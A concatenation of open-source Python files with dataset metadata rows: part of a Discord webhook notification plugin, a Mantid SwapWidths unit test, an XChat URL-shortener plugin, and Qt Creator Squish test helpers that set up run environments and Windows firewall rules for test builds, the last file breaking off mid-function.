# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# For this to work correctly you need to create a webhook. To do this just
# click on the little gear icon next to the channel you're part of. From
# here you'll be able to access the Webhooks menu and create a new one.
#
# When you've completed, you'll get a URL that looks a little like this:
# https://discordapp.com/api/webhooks/417429632418316298/\
# JHZ7lQml277CDHmQKMHI8qBe7bk2ZwO5UKjCiOAF7711o33MyqU344Qpgv7YTpadV_js
#
# Simplified, it looks like this:
# https://discordapp.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN
#
# This plugin will simply work using the url of:
# discord://WEBHOOK_ID/WEBHOOK_TOKEN
#
# API Documentation on Webhooks:
# - https://discordapp.com/developers/docs/resources/webhook
#
import re
import requests
from json import dumps
from .NotifyBase import NotifyBase
from ..common import NotifyImageSize
from ..common import NotifyFormat
from ..common import NotifyType
from ..utils import parse_bool
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
from ..attachment.AttachBase import AttachBase
class NotifyDiscord(NotifyBase):
"""
A wrapper to Discord Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Discord'
# The services URL
service_url = 'https://discordapp.com/'
# The default secure protocol
secure_protocol = 'discord'
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_discord'
# Discord Webhook
notify_url = 'https://discordapp.com/api/webhooks'
# Allows the user to specify the NotifyImageSize object
image_size = NotifyImageSize.XY_256
# The maximum allowable characters allowed in the body per message
body_maxlen = 2000
# Define object templates
templates = (
'{schema}://{webhook_id}/{webhook_token}',
'{schema}://{botname}@{webhook_id}/{webhook_token}',
)
# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'botname': {
'name': _('Bot Name'),
'type': 'string',
'map_to': 'user',
},
'webhook_id': {
'name': _('Webhook ID'),
'type': 'string',
'private': True,
'required': True,
},
'webhook_token': {
'name': _('Webhook Token'),
'type': 'string',
'private': True,
'required': True,
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'tts': {
'name': _('Text To Speech'),
'type': 'bool',
'default': False,
},
'avatar': {
'name': _('Avatar Image'),
'type': 'bool',
'default': True,
},
'footer': {
'name': _('Display Footer'),
'type': 'bool',
'default': False,
},
'footer_logo': {
'name': _('Footer Logo'),
'type': 'bool',
'default': True,
},
'image': {
'name': _('Include Image'),
'type': 'bool',
'default': False,
'map_to': 'include_image',
},
})
def __init__(self, webhook_id, webhook_token, tts=False, avatar=True,
footer=False, footer_logo=True, include_image=False,
**kwargs):
"""
Initialize Discord Object
"""
super(NotifyDiscord, self).__init__(**kwargs)
# Webhook ID (associated with project)
self.webhook_id = validate_regex(webhook_id)
if not self.webhook_id:
msg = 'An invalid Discord Webhook ID ' \
'({}) was specified.'.format(webhook_id)
self.logger.warning(msg)
raise TypeError(msg)
# Webhook Token (associated with project)
self.webhook_token = validate_regex(webhook_token)
if not self.webhook_token:
msg = 'An invalid Discord Webhook Token ' \
'({}) was specified.'.format(webhook_token)
self.logger.warning(msg)
raise TypeError(msg)
# Text To Speech
self.tts = tts
# Over-ride Avatar Icon
self.avatar = avatar
# Place a footer
self.footer = footer
# include a footer_logo in footer
self.footer_logo = footer_logo
# Place a thumbnail image inline with the message body
self.include_image = include_image
return
def send(self, body, title='', notify_type=NotifyType.INFO, attach=None,
**kwargs):
"""
Perform Discord Notification
"""
payload = {
# Text-To-Speech
'tts': self.tts,
# If Text-To-Speech is set to True, then we do not want to wait
# for the whole message before continuing. Otherwise, we wait
'wait': self.tts is False,
}
# Acquire image_url
image_url = self.image_url(notify_type)
if self.notify_format == NotifyFormat.MARKDOWN:
# Use embeds for payload
payload['embeds'] = [{
'provider': {
'name': self.app_id,
'url': self.app_url,
},
'title': title,
'type': 'rich',
'description': body,
# Our color associated with our notification
'color': self.color(notify_type, int),
}]
# Break titles out so that we can sort them in embeds
fields = self.extract_markdown_sections(body)
if len(fields) > 0:
# Apply our additional parsing for a better presentation
# Swap first entry for description
payload['embeds'][0]['description'] = \
fields[0].get('name') + fields[0].get('value')
payload['embeds'][0]['fields'] = fields[1:]
if self.footer:
# Acquire logo URL
logo_url = self.image_url(notify_type, logo=True)
# Set Footer text to our app description
payload['embeds'][0]['footer'] = {
'text': self.app_desc,
}
if self.footer_logo and logo_url:
payload['embeds'][0]['footer']['icon_url'] = logo_url
if self.include_image and image_url:
payload['embeds'][0]['thumbnail'] = {
'url': image_url,
'height': 256,
'width': 256,
}
else:
# not markdown
payload['content'] = \
body if not title else "{}\r\n{}".format(title, body)
if self.avatar and image_url:
payload['avatar_url'] = image_url
if self.user:
# Optionally override the default username of the webhook
payload['username'] = self.user
if not self._send(payload):
# We failed to post our message
return False
if attach:
# Update our payload; the idea is to preserve it's other detected
# and assigned values for re-use here too
payload.update({
# Text-To-Speech
'tts': False,
# Wait until the upload has posted itself before continuing
'wait': True,
})
# Remove our text/title based content for attachment use
if 'embeds' in payload:
# Markdown
del payload['embeds']
if 'content' in payload:
# Markdown
del payload['content']
# Send our attachments
for attachment in attach:
self.logger.info(
'Posting Discord Attachment {}'.format(attachment.name))
if not self._send(payload, attach=attachment):
# We failed to post our message
return False
# Otherwise return
return True
def _send(self, payload, attach=None, **kwargs):
"""
Wrapper to the requests (post) object
"""
# Our headers
headers = {
'User-Agent': self.app_id,
}
# Construct Notify URL
notify_url = '{0}/{1}/{2}'.format(
self.notify_url,
self.webhook_id,
self.webhook_token,
)
self.logger.debug('Discord POST URL: %s (cert_verify=%r)' % (
notify_url, self.verify_certificate,
))
self.logger.debug('Discord Payload: %s' % str(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
# Perform some simple error checking
if isinstance(attach, AttachBase):
if not attach:
# We could not access the attachment
self.logger.error(
'Could not access attachment {}.'.format(
attach.url(privacy=True)))
return False
self.logger.debug(
'Posting Discord attachment {}'.format(
attach.url(privacy=True)))
# Our attachment path (if specified)
files = None
try:
# Open our attachment path if required:
if attach:
files = {'file': (attach.name, open(attach.path, 'rb'))}
else:
headers['Content-Type'] = 'application/json; charset=utf-8'
r = requests.post(
notify_url,
data=payload if files else dumps(payload),
headers=headers,
files=files,
verify=self.verify_certificate,
)
if r.status_code not in (
requests.codes.ok, requests.codes.no_content):
# We had a problem
status_str = \
NotifyBase.http_response_code_lookup(r.status_code)
self.logger.warning(
'Failed to send {}to Discord notification: '
'{}{}error={}.'.format(
attach.name if attach else '',
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug('Response Details:\r\n{}'.format(r.content))
# Return; we're done
return False
else:
self.logger.info('Sent Discord {}.'.format(
'attachment' if attach else 'notification'))
except requests.RequestException as e:
self.logger.warning(
'A Connection error occured posting {}to Discord.'.format(
attach.name if attach else ''))
self.logger.debug('Socket Exception: %s' % str(e))
return False
except (OSError, IOError) as e:
self.logger.warning(
'An I/O error occured while reading {}.'.format(
attach.name if attach else 'attachment'))
self.logger.debug('I/O Exception: %s' % str(e))
return False
finally:
# Close our file (if it's open) stored in the second element
# of our files tuple (index 1)
if files:
files['file'][1].close()
return True
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any arguments set
args = {
'format': self.notify_format,
'overflow': self.overflow_mode,
'tts': 'yes' if self.tts else 'no',
'avatar': 'yes' if self.avatar else 'no',
'footer': 'yes' if self.footer else 'no',
'footer_logo': 'yes' if self.footer_logo else 'no',
'image': 'yes' if self.include_image else 'no',
'verify': 'yes' if self.verify_certificate else 'no',
}
return '{schema}://{webhook_id}/{webhook_token}/?{args}'.format(
schema=self.secure_protocol,
webhook_id=self.pprint(self.webhook_id, privacy, safe=''),
webhook_token=self.pprint(self.webhook_token, privacy, safe=''),
args=NotifyDiscord.urlencode(args),
)
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to substantiate this object.
Syntax:
discord://webhook_id/webhook_token
"""
results = NotifyBase.parse_url(url)
if not results:
# We're done early as we couldn't load the results
return results
# Store our webhook ID
webhook_id = NotifyDiscord.unquote(results['host'])
# Now fetch our tokens
try:
webhook_token = \
NotifyDiscord.split_path(results['fullpath'])[0]
except IndexError:
# Force some bad values that will get caught
# in parsing later
webhook_token = None
results['webhook_id'] = webhook_id
results['webhook_token'] = webhook_token
# Text To Speech
results['tts'] = parse_bool(results['qsd'].get('tts', False))
# Use Footer
results['footer'] = parse_bool(results['qsd'].get('footer', False))
# Use Footer Logo
results['footer_logo'] = \
parse_bool(results['qsd'].get('footer_logo', True))
# Update Avatar Icon
results['avatar'] = parse_bool(results['qsd'].get('avatar', True))
# Use Thumbnail
if 'thumbnail' in results['qsd']:
# Deprication Notice issued for v0.7.5
NotifyDiscord.logger.deprecate(
'The Discord URL contains the parameter '
'"thumbnail=" which will be deprecated in an upcoming '
'release. Please use "image=" instead.'
)
# use image= for consistency with the other plugins but we also
# support thumbnail= for backwards compatibility.
results['include_image'] = \
parse_bool(results['qsd'].get(
'image', results['qsd'].get('thumbnail', False)))
return results
@staticmethod
def parse_native_url(url):
"""
Support https://discordapp.com/api/webhooks/WEBHOOK_ID/WEBHOOK_TOKEN
"""
result = re.match(
r'^https?://discordapp\.com/api/webhooks/'
r'(?P<webhook_id>[0-9]+)/'
r'(?P<webhook_token>[A-Z0-9_-]+)/?'
r'(?P<args>\?.+)?$', url, re.I)
if result:
return NotifyDiscord.parse_url(
'{schema}://{webhook_id}/{webhook_token}/{args}'.format(
schema=NotifyDiscord.secure_protocol,
webhook_id=result.group('webhook_id'),
webhook_token=result.group('webhook_token'),
args='' if not result.group('args')
else result.group('args')))
return None
@staticmethod
def extract_markdown_sections(markdown):
"""
Takes a string in a markdown type format and extracts
the headers and their corresponding sections into individual
fields that get passed as an embed entry to Discord.
"""
regex = re.compile(
r'\s*#[# \t\v]*(?P<name>[^\n]+)(\n|\s*$)'
r'\s*((?P<value>[^#].+?)(?=\s*$|[\r\n]+\s*#))?', flags=re.S)
common = regex.finditer(markdown)
fields = list()
for el in common:
d = el.groupdict()
fields.append({
'name': d.get('name', '').strip('# \r\n\t\v'),
'value': '```md\n' +
(d.get('value').strip() if d.get('value') else '') + '\n```'
})
return fields
| gpl-3.0 | -2,154,137,183,837,371,400 | 32.133333 | 79 | 0.539983 | false |
peterfpeterson/mantid | Framework/PythonInterface/test/python/plugins/algorithms/WorkflowAlgorithms/SwapWidthsTest.py | 3 | 3004 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
import unittest
from mantid.simpleapi import *
from mantid.api import MatrixWorkspace, WorkspaceGroup
class SwapWidthsTest(unittest.TestCase):
_input_ws = 'IN16B_125878_QLd_Result'
_swap_point = 5
def setUp(self):
self._input_ws = Load(Filename='IN16B_125878_QLd_Result.nxs', OutputWorkspace=self._input_ws)
def _validate_result_shape(self, result):
"""
Validates that the result workspace is of the correct type, units and shape.
@param result Result workspace from SwapWidths algorithm
"""
self.assertTrue(isinstance(result, MatrixWorkspace))
self.assertEqual(result.getNumberHistograms(), 2)
self.assertEqual(result.blocksize(), self._input_ws.blocksize())
self.assertEqual(result.getAxis(0).getUnit().unitID(), 'MomentumTransfer')
self.assertEqual(result.getAxis(1).label(0), 'f2.f1.FWHM')
self.assertEqual(result.getAxis(1).label(1), 'f2.f2.FWHM')
def _validate_result_values(self, result):
"""
Validates the result workspace has the expected values to a realistic number of significant figures.
@param result :: The Result workspace from SwapWidths algorithm
"""
# Get f2.f1/2.FWHM axis numbers
# f2.f1.FWHM = first_fwhm, f2.f2.FWHM = second_fwhm
first_fwhm_idx = 0
second_fwhm_idx = 0
for i in range (0,self._input_ws.getNumberHistograms() - 1):
if self._input_ws.getAxis(1).label(i) == 'f2.f1.FWHM':
first_fwhm_idx = i
if self._input_ws.getAxis(1).label(i) == 'f2.f2.FWHM':
second_fwhm_idx = i
# Get Y Data for input/result
in_first_fwhm = self._input_ws.dataY(first_fwhm_idx)
in_second_fwhm = self._input_ws.dataY(second_fwhm_idx)
result_first_fwhm = result.dataY(0)
result_second_fwhm = result.dataY(1)
# Check data is correct after swap
for i in range(0, len(in_first_fwhm)):
if i <= self._swap_point:
self.assertEqual(in_first_fwhm[i], result_first_fwhm[i])
self.assertEqual(in_second_fwhm[i], result_second_fwhm[i])
else:
self.assertEqual(in_first_fwhm[i], result_second_fwhm[i])
self.assertEqual(in_second_fwhm[i], result_first_fwhm[i])
def test_basic(self):
"""
Tests a basic run of SwapWidths.
"""
result = SwapWidths(InputWorkspace=self._input_ws,
SwapPoint=self._swap_point)
self._validate_result_shape(result)
self._validate_result_values(result)
if __name__=="__main__":
unittest.main()
| gpl-3.0 | 8,340,603,536,086,600,000 | 37.025316 | 108 | 0.629161 | false |
Jake0720/XChat-Scripts | short.py | 1 | 3543 | __module_name__ = 'Short'
__module_version__ = '1.0'
__module_description__ = 'Auto link shortener with http://links.ml'
__module_author__ = 'Liam Stanley'
import xchat
import urllib, re
c = '\x0304'
help = ("/short <url|enable|disable>\n"
" - url: url/link that you would like to be shortened. E.g, http://liamstanley.io\n"
" - enable: Enable the auto conversion of links that you enter in the input box.\n"
" Remember, only correct URLs will be converted, and links in commands\n"
" will be ignored.\n"
" - disable: Disable the auto conversion of URLs that are entered in the input box.\n"
" [NOTE]: Use your notepad enter key to sent text without conversion, temporarily.")
def post(query):
data = urllib.urlencode(query)
u = urllib.urlopen('http://links.ml/submit', data)
bytes = u.read()
u.close()
return bytes
def shorten(url):
try:
data = post({'api': True, 'link': url})
if 'bad request' in data.lower(): return
return data
except: return
def send_message(word, word_eol, userdata):
"""Gets the inputbox's text, replace URL's with shortened URLs.
This function is called every time a key is pressed. It will stop if that
key isn't Enter or if the input box is empty.
KP_Return (keypad Enter key) is ignored, and can be used if you don't want
a URL to be shortened.
"""
if not prefs('get'):
return
if not(word[0] == "65293"): return
msg = xchat.get_info('inputbox')
if msg is None: return
if msg.startswith('/'): return
urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', msg)
if not urls: return
for url in urls:
try:
data = shorten(url)
if not data: continue
msg = msg.replace(url, str(data))
except: continue
xchat.command("settext %s" % msg)
return xchat.EAT_ALL
def short(word, word_eol, userdata):
"""shortens the url passed as an arguement."""
try:
if len(word) == 1:
return xchat.prnt(help)
if word_eol[1].lower() in ['on', 'enable', 'true']:
prefs('put', 'on')
return
elif word_eol[1].lower() in ['off', 'disable', 'false']:
prefs('put', 'off')
return
else:
url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', word_eol[1])
if not url: return xchat.prnt(help)
url = url[0]
data = shorten(url)
if not data: return xchat.prnt(help)
new = word_eol[1].replace(url, str(data))
xchat.command('say %s' % new)
except:
xchat.prnt(help)
return xchat.EAT_ALL
def prefs(job, args=None):
"""Saves|Gets preferences."""
if job == 'get':
status = xchat.get_pluginpref("shorten_status")
# Get data from database
if not status: return True
else:
if status == 'on': return True
else: return False
if job == 'put' and args:
xchat.set_pluginpref("shorten_status", args)
xchat.prnt("Preferences saved.")
def onUnload(userdata):
xchat.prnt('%s%s has been unloaded.' % (c, __module_name__))
xchat.hook_print('Key Press', send_message)
xchat.hook_command("short", short, help=help)
xchat.hook_unload(onUnload)
print('%s%s Version %s has been loaded.' % (c, __module_name__, __module_version__))
| mit | 9,194,640,254,899,396,000 | 33.067308 | 123 | 0.570421 | false |
colede/qtcreator | tests/system/shared/hook_utils.py | 2 | 21179 | #############################################################################
##
## Copyright (C) 2014 Digia Plc and/or its subsidiary(-ies).
## Contact: http://www.qt-project.org/legal
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and Digia. For licensing terms and
## conditions see http://qt.digia.com/licensing. For further information
## use the contact form at http://qt.digia.com/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 as published by the Free Software
## Foundation and appearing in the file LICENSE.LGPL included in the
## packaging of this file. Please review the following information to
## ensure the GNU Lesser General Public License version 2.1 requirements
## will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, Digia gives you certain additional
## rights. These rights are described in the Digia Qt LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
import re
# this function modifies all necessary run settings to make it possible to hook into
# the application compiled by Creator
def modifyRunSettingsForHookInto(projectName, kitCount, port):
prepareBuildSettings(kitCount, 0)
# this uses the default Qt version which Creator activates when opening the project
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, 0, ProjectSettings.BUILD)
qtVersion, mkspec, qtBinPath, qtLibPath = getQtInformationForBuildSettings(kitCount, True)
if None in (qtVersion, mkspec, qtBinPath, qtLibPath):
test.fatal("At least one of the Qt information returned None - leaving...",
"Qt version: %s, mkspec: %s, Qt BinPath: %s, Qt LibPath: %s" %
(qtVersion, mkspec, qtBinPath, qtLibPath))
return False
qtVersion = ".".join(qtVersion.split(".")[:2])
switchToBuildOrRunSettingsFor(kitCount, 0, ProjectSettings.RUN)
result = __configureCustomExecutable__(projectName, port, mkspec, qtVersion)
if result:
ensureChecked(":RunSettingsEnvironmentDetails_Utils::DetailsButton")
envVarsTableView = waitForObject("{type='QTableView' visible='1' unnamed='1'}")
model = envVarsTableView.model()
changingVars = []
for index in dumpIndices(model):
# get var name
envVarsTableView.scrollTo(index)
varName = str(model.data(index).toString())
# if its a special SQUISH var simply unset it, SQUISH_LIBQTDIR and PATH will be replaced with Qt paths
if varName == "PATH":
test.log("Replacing PATH with '%s'" % qtBinPath)
changingVars.append("PATH=%s" % qtBinPath)
elif varName.find("SQUISH") == 0:
if varName == "SQUISH_LIBQTDIR":
if platform.system() in ('Microsoft', 'Windows'):
replacement = qtBinPath
else:
replacement = qtLibPath
test.log("Replacing SQUISH_LIBQTDIR with '%s'" % replacement)
changingVars.append("SQUISH_LIBQTDIR=%s" % replacement)
else:
changingVars.append(varName)
elif varName == "DYLD_FRAMEWORK_PATH" and platform.system() == 'Darwin':
value = str(model.data(model.index(index.row, 1)).toString())
test.log("Adding %s to DYLD_FRAMEWORK_PATH" % qtLibPath)
replacement = ":".join(filter(len, [qtLibPath, value]))
changingVars.append("%s=%s" % (varName, replacement))
batchEditRunEnvironment(kitCount, 0, changingVars, True)
switchViewTo(ViewConstants.EDIT)
return result
def batchEditRunEnvironment(kitCount, currentTarget, modifications, alreadyOnRunSettings=False):
if not alreadyOnRunSettings:
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, currentTarget, ProjectSettings.RUN)
ensureChecked(":RunSettingsEnvironmentDetails_Utils::DetailsButton")
clickButton(waitForObject("{text='Batch Edit...' type='QPushButton' unnamed='1' visible='1' "
"window=':Qt Creator_Core::Internal::MainWindow'}"))
editor = waitForObject("{type='TextEditor::SnippetEditorWidget' unnamed='1' visible='1' "
"window=':Edit Environment_ProjectExplorer::EnvironmentItemsDialog'}")
typeLines(editor, modifications)
clickButton(waitForObject("{text='OK' type='QPushButton' unnamed='1' visible='1' "
"window=':Edit Environment_ProjectExplorer::EnvironmentItemsDialog'}"))
def modifyRunSettingsForHookIntoQtQuickUI(kitCount, kit, workingDir, projectName, port, quickVersion="1.1"):
switchViewTo(ViewConstants.PROJECTS)
switchToBuildOrRunSettingsFor(kitCount, kit, ProjectSettings.RUN, True)
qtVersion, mkspec, qtLibPath, qmake = getQtInformationForQmlProject()
if None in (qtVersion, mkspec, qtLibPath, qmake):
test.fatal("At least one of the Qt information returned None - leaving...",
"Qt version: %s, mkspec: %s, Qt LibPath: %s, qmake: '%s'"
% (qtVersion, mkspec, qtLibPath, qmake))
return None
squishPath = getSquishPath(mkspec, qtVersion)
if squishPath == None:
test.warning("Could not determine the Squish path for %s/%s" % (qtVersion, mkspec),
"Using fallback of pushing STOP inside Creator.")
return None
test.log("Using (QtVersion/mkspec) %s/%s with SquishPath %s" % (qtVersion, mkspec, squishPath))
if quickVersion == "1.1":
if platform.system() == "Darwin":
executable = os.path.abspath(os.path.dirname(qmake) + "/QMLViewer.app")
else:
executable = os.path.abspath(os.path.dirname(qmake) + "/qmlviewer")
else:
executable = os.path.abspath(os.path.dirname(qmake) + "/qmlscene")
if platform.system() in ('Microsoft', 'Windows'):
executable = executable + ".exe"
startAUT = os.path.abspath(squishPath + "/bin/startaut")
if platform.system() in ('Microsoft', 'Windows'):
startAUT = startAUT + ".exe"
args = "--verbose --port=%d %s %s.qml" % (port, executable, projectName)
projectPath = os.path.abspath("%s/%s" % (workingDir, projectName))
__invokeAddCustomExecutable__(startAUT, args, projectPath)
clickButton(waitForObject("{text='Details' type='Utils::DetailsButton' unnamed='1' visible='1' "
"window=':Qt Creator_Core::Internal::MainWindow' "
"leftWidget={type='QLabel' text~='Us(e|ing) <b>Build Environment</b>'"
" unnamed='1' visible='1'}}"))
for varName in ("PATH", "SQUISH_LIBQTDIR"):
__addVariableToRunEnvironment__(varName, qtLibPath)
if not platform.system() in ('Microsoft', 'Windows', 'Darwin'):
__addVariableToRunEnvironment__("LD_LIBRARY_PATH", qtLibPath)
if platform.system() == "Darwin":
__addVariableToRunEnvironment__("DYLD_FRAMEWORK_PATH", qtLibPath)
if not platform.system() in ('Microsoft', 'Windows'):
if not os.getenv("DISPLAY"):
__addVariableToRunEnvironment__("DISPLAY", ":0.0")
result = executable
switchViewTo(ViewConstants.EDIT)
return result
# this helper method must be called on the run settings page of a Qt Quick UI with DetailsWidget
# for the run settings already opened - it won't work on other views because of a different layout
def __addVariableToRunEnvironment__(name, value):
clickButton(waitForObject("{text='Add' type='QPushButton' unnamed='1' visible='1' "
"container={window=':Qt Creator_Core::Internal::MainWindow' "
"type='Utils::DetailsWidget' unnamed='1' visible='1' occurrence='2'}}"))
varNameLineEd = waitForObject("{type='QExpandingLineEdit' visible='1' unnamed='1'}")
doubleClick(varNameLineEd)
replaceEditorContent(varNameLineEd, name)
type(varNameLineEd, "<Return>")
row = getTableRowOf(name, ":Qt Creator_QTableView")
if row == -1:
test.fatal("Could not find entered variable name inside table - skipping entering value.")
return
valueLineEd = __doubleClickQTableView__(":Qt Creator_QTableView", row, 1)
replaceEditorContent(valueLineEd, value)
type(valueLineEd, "<Return>")
def getTableRowOf(value, table):
tblModel = waitForObject(table).model()
items = dumpItems(tblModel)
if value in items:
return items.index(value)
else:
return -1
def __getMkspecFromQMakeConf__(qmakeConf):
if qmakeConf==None or not os.path.exists(qmakeConf):
return None
if not platform.system() in ('Microsoft', 'Windows'):
return os.path.basename(os.path.realpath(os.path.dirname(qmakeConf)))
mkspec = None
file = codecs.open(qmakeConf, "r", "utf-8")
for line in file:
if "QMAKESPEC_ORIGINAL" in line:
mkspec = line.split("=")[1]
break
file.close()
if mkspec == None:
test.warning("Could not determine mkspec from '%s'" % qmakeConf)
return None
return os.path.basename(mkspec)
def __getMkspecFromQmake__(qmakeCall):
if getOutputFromCmdline("%s -query QT_VERSION" % qmakeCall).strip().startswith("5."):
return getOutputFromCmdline("%s -query QMAKE_XSPEC" % qmakeCall).strip()
else:
QmakeConfPath = getOutputFromCmdline("%s -query QMAKE_MKSPECS" % qmakeCall).strip()
for tmpPath in QmakeConfPath.split(os.pathsep):
tmpPath = tmpPath + os.sep + "default" + os.sep +"qmake.conf"
result = __getMkspecFromQMakeConf__(tmpPath)
if result != None:
return result.strip()
test.warning("Could not find qmake.conf inside provided QMAKE_MKSPECS path",
"QMAKE_MKSPECS returned: '%s'" % QmakeConfPath)
return None
# helper that double clicks the table view at specified row and column
# returns the QExpandingLineEdit (the editable table cell)
def __doubleClickQTableView__(qtableView, row, column):
doubleClick(waitForObject("{container='%s' "
"type='QModelIndex' row='%d' column='%d'}" % (qtableView, row, column)), 5, 5, 0, Qt.LeftButton)
return waitForObject("{type='QExpandingLineEdit' visible='1' unnamed='1'}")
# this function configures the custom executable onto the run settings page (using startaut from Squish)
def __configureCustomExecutable__(projectName, port, mkspec, qmakeVersion):
startAUT = getSquishPath(mkspec, qmakeVersion)
if startAUT == None:
test.warning("Something went wrong determining the right Squish for %s / %s combination - "
"using fallback without hooking into subprocess." % (qmakeVersion, mkspec))
return False
else:
startAUT = os.path.abspath(startAUT + "/bin/startaut")
if platform.system() in ('Microsoft', 'Windows'):
startAUT += ".exe"
if not os.path.exists(startAUT):
test.warning("Configured Squish directory seems to be missing - using fallback without hooking into subprocess.",
"Failed to find '%s'" % startAUT)
return False
progressBarWait()
# the following is currently only configured for release builds (will be enhanced later)
if platform.system() in ('Microsoft', 'Windows'):
debOrRel = "release" + os.sep
else:
debOrRel = ""
args = "--verbose --port=%d %s%s" % (port, debOrRel, projectName)
__invokeAddCustomExecutable__(startAUT, args)
return True
# get the Squish path that is needed to successfully hook into the compiled app
def getSquishPath(mkspec, qmakev):
# assuming major and minor version will be enough
squishVersion = "%d.%d" % (squishinfo.major, squishinfo.minor)
qmakev = ".".join(qmakev.split(".")[0:2])
path = None
mapfile = os.environ.get("QT_SQUISH_MAPFILE")
if mapfile and os.path.isfile(mapfile):
file = codecs.open(mapfile, "r", "utf-8")
pattern = re.compile("\s+")
for line in file:
if line[0] == "#":
continue
tmp = pattern.split(line, 3)
if (tmp[0].strip("'\"") == squishVersion and tmp[1].strip("'\"") == qmakev
and tmp[2].strip("'\"") == mkspec):
path = os.path.expanduser(tmp[3].strip().strip("'\""))
break
file.close()
else:
if not mapfile:
test.warning("Environment variable QT_SQUISH_MAPFILE isn't set. Using fallback test data.",
"See the README file how to use it.")
else:
test.warning("Environment variable QT_SQUISH_MAPFILE isn't set correctly or map file does not exist. Using fallback test data.",
"See the README file how to use it.")
# try the test data fallback
mapData = testData.dataset(os.getcwd() + "/../../shared_data/qt_squish_mapping.tsv")
for record in mapData:
if (testData.field(record, "squishversion") == squishVersion and
testData.field(record, "qtversion") == qmakev
and testData.field(record, "mkspec") == mkspec):
path = os.path.expanduser(testData.field(record, "path"))
break
if path == None:
test.warning("Haven't found suitable Squish version with matching Qt version and mkspec.",
"See the README file how to set up your environment.")
elif not os.path.exists(path):
test.warning("Squish path '%s' from fallback test data file does not exist!" % path,
"See the README file how to set up your environment.")
return None
return path
# function to add a program to allow communication through the win firewall
# param workingDir this directory is the parent of the project folder
# param projectName this is the name of the project (the folder inside workingDir as well as the name for the executable)
# param isReleaseBuild should currently always be set to True (will later add debug build testing)
def allowAppThroughWinFW(workingDir, projectName, isReleaseBuild=True):
if not __isWinFirewallRunning__():
return
# WinFirewall seems to run - hopefully no other
result = __configureFW__(workingDir, projectName, isReleaseBuild)
if result == 0:
test.log("Added %s to firewall" % projectName)
else:
test.fatal("Could not add %s as allowed program to win firewall" % projectName)
# function to delete a (former added) program from the win firewall
# param workingDir this directory is the parent of the project folder
# param projectName this is the name of the project (the folder inside workingDir as well as the name for the executable)
# param isReleaseBuild should currently always be set to True (will later add debug build testing)
def deleteAppFromWinFW(workingDir, projectName, isReleaseBuild=True):
if not __isWinFirewallRunning__():
return
# WinFirewall seems to run - hopefully no other
result = __configureFW__(workingDir, projectName, isReleaseBuild, False)
if result == 0:
test.log("Deleted %s from firewall" % projectName)
else:
test.warning("Could not delete %s as allowed program from win firewall" % (projectName))
# helper that can modify the win firewall to allow a program to communicate through it or delete it
# param addToFW defines whether to add (True) or delete (False) this program to/from the firewall
def __configureFW__(workingDir, projectName, isReleaseBuild, addToFW=True):
if isReleaseBuild == None:
if projectName[-4:] == ".exe":
projectName = projectName[:-4]
path = "%s%s%s" % (workingDir, os.sep, projectName)
elif isReleaseBuild:
path = "%s%s%s%srelease%s%s" % (workingDir, os.sep, projectName, os.sep, os.sep, projectName)
else:
path = "%s%s%s%sdebug%s%s" % (workingDir, os.sep, projectName, os.sep, os.sep, projectName)
if addToFW:
mode = "add"
enable = "ENABLE"
else:
mode = "delete"
enable = ""
projectName = ""
# Needs admin privileges on Windows 7
# Using the deprecated "netsh firewall" because the newer
# "netsh advfirewall" would need admin privileges on Windows Vista, too.
return subprocess.call('netsh firewall %s allowedprogram "%s.exe" %s %s' % (mode, path, projectName, enable))
# helper to check whether win firewall is running or not
# this doesn't check for other firewalls!
def __isWinFirewallRunning__():
if hasattr(__isWinFirewallRunning__, "fireWallState"):
return __isWinFirewallRunning__.fireWallState
if not platform.system() in ('Microsoft' 'Windows'):
__isWinFirewallRunning__.fireWallState = False
return False
result = getOutputFromCmdline("netsh firewall show state")
for line in result.splitlines():
if "Operational mode" in line:
__isWinFirewallRunning__.fireWallState = not "Disable" in line
return __isWinFirewallRunning__.fireWallState
return None
def __fixQuotes__(string):
if platform.system() in ('Windows', 'Microsoft'):
string = '"' + string + '"'
return string
# this function adds the given executable as an attachable AUT
# Bad: executable/port could be empty strings - you should be aware of this
def addExecutableAsAttachableAUT(executable, port, host=None):
if not __checkParamsForAttachableAUT__(executable, port):
return False
if host == None:
host = "localhost"
squishSrv = __getSquishServer__()
if (squishSrv == None):
return False
